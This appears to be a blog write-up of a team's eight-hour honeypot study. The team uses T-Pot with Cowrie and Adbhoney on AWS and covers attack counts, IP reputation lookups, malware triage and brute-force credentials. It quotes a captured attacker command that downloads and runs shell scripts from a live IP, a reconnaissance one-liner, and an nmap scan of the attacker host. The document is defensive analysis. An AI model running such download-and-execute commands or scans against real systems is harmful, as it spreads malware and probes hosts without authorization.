8 Hours Honeypot: Cowrie and Adbhoney
My team and I had used Telekom Security’s “Tpotce” project to set up a honeypot on Amazon Web Services (AWS) because it covers everything you could need to do basic threat intelligence.
We first had to build the honeypot:
We logged into our AWS account and created an instance in the EC2 console. One of my team members, Tim Chan had chosen North California while I chose North Virginia. At the end we compared the East with the West to differentiate the differences of gathered information and data to educate ourselves of our findings.
In the AWS marketplace, we chose Debian 10 Buster for the Amazon Machine Images (AMI), t2.Xlarge as the instance type and configure details because we’ll need to handle both the ELK stack that we’ll be using to monitor the attacks and the many honeypots running in docker containers. The storage needed was at least 128GB for general-purpose Solid-State Drive 2 (SSD2).
Elk stack = an acronym for a combination of three widely used open source projects: Elasticsearch, Logstash, Kibana, and Beats.
Once the instance had been created, we need to connect to the instance by using Secure Shell (SSH). More information on how to create an EC2 instance can be found here.
After SSH-ing to the instance, in the Linux terminal, make sure to update, upgrade and then install git:
sudo apt updatesudo apt upgradesudo apt install git
Check out git — helpfor the documentation for git that provides the synopsis of the git command and a list of the most commonly used Git commands.
Clone the tpotce repository, cdin and run the install script:
git clone https://github.com/telekom-security/tpotce.gitcd tpotce./install.sh --type=user
In the installer, you will be prompted to provide/create a username and password; save those information because you will need it when you login each time. In addition, choose the “STANDARD” configuration when prompted with another window/box that pops up on the terminal.
After you had completed, everything above, you will upgrade the security group in your AWS for the honeypot instance by selecting the Security and then Edit Inbound Rules. In the Inbound rules, you will have 3 Custom TCP Type, protocol should be TCP for all, and the Source should be Custom for all. There should be one Port range at 64295, second one should be 64297, and the third one should be a range from 1–64000. The one that has the Port range at 64295, you can enter the AWS instance public IP address and the description should read, “SSH for administrators”. The one that has the Port range at 64297, you can enter the AWS instance public IP address and the description should read, “Web Administrator”. Lastly, the one with the Port range from 1–64000 should have the IP address at 0.0.0.0/0 and the description should read, “let the adversaries in.”
After completing the Inbound rules, now you should be able to login with SSH to port 64295, web admin portal at 64297.
If you are looking for an alternative method of understanding how to “Create a Honeypot”, please check out the link here.
PROJECT
For this project, we used Spiderfoot, which is a tool that allows users to collect OSINT from multiple sources, sort the data, and investigate the findings from a single platform. We also used these APIs: SHODAN, Virustotal, and Alienvault.
COWRIE:
Our team are tasked with analyzing all attacks on the honeypots for a period of 8 hours. We analyzed 8 hours of Cowrie honeypot traffic in order to see if there were any patterns available.
Cowrie = Not the marine mollusk, but a honeypot which is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker.
So far, at the dashboard reveals a total of 9,075 attacks from 59 unique src IP addresses. There is a high concentration of attacks in China, United States, and Japan.
We looked at what the attackers were doing once they had access, which commands they used to run and had noticed that some attackers would use reconnaissance on the operating system as well as architecture but for this specific timeframe most would try to upload malicious payloads. Some of the attacks looked the same even though they were from different nations.
In the T-Pot web console, the Kibana app has the Cowrie Dashboard which shows high level overview of an absolute 8-hour period of the date: February 8, 2022 from 6:30am to 2:30pm. I chose the source IP with the largest count: 43.134.209.220. The 43.154.200.191 is also 258 counts and has similar information as 43.134.209.220; also part of tencent clouda, a company shown as from Hong Kong.
When clicking on the link for the highest source IP address, I am forwarded to the Cisco Talos Intelligence which is a reputation lookup service.
There are no associated IP addresses from the same subnet:
Checked the WHOIS plugin for more information such as the Domain Name and Owner:
The netname is ACEVILLEPTELDTD-SG. The address shows 16 Collyer Quay, #18–29, Income at Raffles, Singapore. Although the location data shows up as HK for Central, Hong Kong, a simple Google search revealed that Aceville Pte. Ltd is a private company limited by shares incorporated in Singapore.
ADBHoney
adbhoney = The Android Debug Bridge (ADB) is a protocol designed to keep track of both emulated and real phones/TVs/DVRs connected to a given host. It’s a low interaction honeypot designed for ADB over TCP/IP. This platform includes the ELK stack to visualize all the data collected and Spiderfoot to automate the OSINT process.
The attacker IP address in this scenario is 141.98.10.25.
Command Line Input is:
cd /data/local/tmp/; busybox wget http://209.141.33.122/w.sh; sh w.sh; curl http://209.141.33.122/c.sh; sh c.shWe took a look at the first file attempt which is w.sh by going into Virustotal.com website and scanned the URL http://209.141.33.122/w.sh for some interesting information.
Some of these cyber companies such as CyRadar and Trustwave had flagged this website as Malicious while Sophos, Kaspersky, Emsisoft, and Abusix has flagged it as Malware.
When we used the reconnaissance tool Spiderfoot to analyze the attacker IP address we were able to see that this IP address comes from known malicious subnet.
Based on the data, there are 394 Total Data Elements of Blacklisted IP on Same Subnet.
And, when checking the details of the Blacklisted IP on the same Subnet, we can see that the IP address turns from a Recent Spammer to a Brute Force Attacker.
SORBS = Spam and Open Relay Blocking System provides free access to its DNS-based Block List (DNSBL) to effectively block email from more than 12 million host servers known to disseminate spam, phishing attacks and other forms of malicious email. The list typically includes email servers suspected of sending or relaying spam, servers that have been hacked and hijacked, and those with Trojan infestations.
Uceprotect = a DNS blacklisting service that is compromised of three distinct zones: dnsbl-1.uceprotect.net, dnsbl-2.uceprotect.net, and dnsbl-3.uceprotect.net. Each zone has different listing criteria, all of which are extremely important to understand before using any zone within the service.
dronebl.org (DroneBL) is a realtime monitor of abuseable Ips, which has the goal of stopping abuse of infected machines. This adversary is trying to download malware, attempting to exploit the system.
Customizing your Cowrie honeypot
In the Kibana Discover tab, data is filtered for 8 hours, filtered for Cowrie and occurrences in which commands were run.
The 8 hour analysis shows that at 10am there were 113 attacks and by the time it reached 3:30pm, there were 322 attacks.
Checked out the source ip address: 43.154.190.224 because it’s the most popular hit; for some interesting information, viewed the table, scrolled to the input section of the data, and found that attackers had tried different methods to exploit. Looking at the below snip, we can see that the data are chronological and based on the analysis of the IP addresses of the attackers and the commands they ran, the attackers tried to:
remove a hidden file: “.s” and then exiting. They tried to use BusyBox to interact with the operating system.
Busybox is a program that can perform the actions of many common UNIX programs, such as ls , chmod, wget, cat, etc. Most commonly, it’s used in embedded Linux due to its small executable size (Ryan Cheu).
The attackers added an acronym at the end of the directory named, UJLDG. Googled, UJLDG and found out it was all in French. Google translated Union des Jeunes Leaders du Departement de Gohitafla and it turns out it says, “Union of Young Leaders of the Department of Gohitafla.” Did another Google search on where Gohitafla is located and the result shows it’s a town in central Ivory Coast, a French colony, a country in West Africa, where the people do speak French. With Busybox, they were able to use commands to find out interesting information in my system such as when they tried to use the dd tool which is a built-in command-line utility, where you can transfer data from one drive to another while also making sure that the data itself is not changed.
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
I haven’t seen any files containing malware because the attacker is still at the initial stage, trying to gather information, who had changed their own UNIX password and then tried to change their own password in Bash.
We ran a query against an IP reputation checker like Talos Intelligence using the IP address: 43.154.190.224 which shows that the Location Data is in Central, Hong Kong, Email Reputation is Poor, Spam Level is Critical, and the Network Owner is tencent cloud computing. Googled, “tencent cloud computing”:
and selected the link from scamalytics.com which showed the Network Owner to be a potentially low fraud risk Internet Service Provider (ISP), by which we mean that web traffic form this ISP potentially poses a low risk of being fraudulent. Surprisingly, they also manage IP addresses for organizations including Aceville Pte. ltd, which was the initial find in the IP address prior to this one that showed the most hit source IP. The other subnet associated with this IP address 43.154.190.224 is 43.154.190.185; the Email Reputation for 43.154.190.185 shows that it is Untrusted.
Analysis of commands run: Adbhoney
Not much activity as expected except for a file w.sh which was found with the src.ip=141.98.10.25 I became curious about the file and wanted to see what was in there, so checked it out.
MALWARE ANALYSIS
I opened up my Metasploitable and downloaded by using the command wget http://209.141.33.122/w.sh. I made sure my internet was turned off before checking what was inside the file.
“Hitme” the alias of the adversary was setting up all the malicious files with all permissions to execute these files. They used the APK, Busybox installer for Android. This version of the installer combines various versions of different UNIX tools in one app that you can install on your Android device with just a few taps. Looked like Hitme could be a ScriptKiddie.
APK = Android Package file is a file format which is created by Google.
I wanted to check out this IP address: 141.98.10.25, therefore ran a query against an IP reputation checker using Talos. The result shows that the IP address’ Location Data is in Lithuania, the Email Reputation is Poor, and the Spam Level is Critical. In addition, there were 253 results of Top IP Addresses used to send emails in 141.98.10.25/24. Some of the Email Reputation were untrusted and most were neutral.
I also uploading this file: http://209.141.33.122/w.sh on Virustotal.com to see what kind of information I was able to find; which resulted the file is malicious and malware.
Did a quick nmap scan on the IP address of the file using the command:
sudo nmap -Pn -sV -O -A -v 209.141.33.122
and the only 2 ports that was discovered so far were 80/tcp and 3306/tcp. I also checked the IP address in the URL bar and this screenshot was the result:
TROJAN:
When looking Cowrie’s Top URI Downloads, we can see that there is a T-Pot Path which has a hash file that’s interesting.
I saw that the file with hash in virustotal.com and found many interesting information in it. Multiple vendors had tagged this hash as Trojan.
USERNAME AND PASSWORD ANALYSIS
This is a data table chart with the values of usernames, passwords, and count of records from the cowrie honeypot. There are some interesting patterns available, and these are the results of the top values of usernames that were used for login attempts.
However, when adding information about passwords, a different result shows all the possible passwords for each usernames displayed:
For the username, admin, the passwords are much simpler; however for root, the password tends to be more complicated. On the other hand, only the first 3 values of the passwords for root seems as if it can be easily brute forced to find the password.
DEBRIEF
As you can see, we had used T-Pot which is centered on the Debian network installer whereas the honeypot daemons as well as other helpful factors were dockered (the persistent process that manages containers). This permitted T-Pot to run several honeypot daemons and tools on the same network interface while retaining a small trajectory and confine each honeypot within its own environment.
Daemon = a computer program that runs as a background process, rather than being under the direct control of an interactive user.
Deploying effectively and incorporating honeypots and establishing computer software into an open infrastructure can be an overwhelming mission that involves enough preparation. Still, the pros are apparent if done correctly. Honeypots facilitate swifter alerting also a preventative point of view into present incident tactics and automated incidents compared to publicly accessible infrastructure and decrease the volume of manual work completed by analysts. Fused with pervasive log collection and well-made dashboards, this accolades enhanced defensive tactics and methods opposed to new incidents.
If you like the content here, you’ll also enjoy reading one of my team member,
Justin Hooper Honeypot OSINT. Thank you for reading.
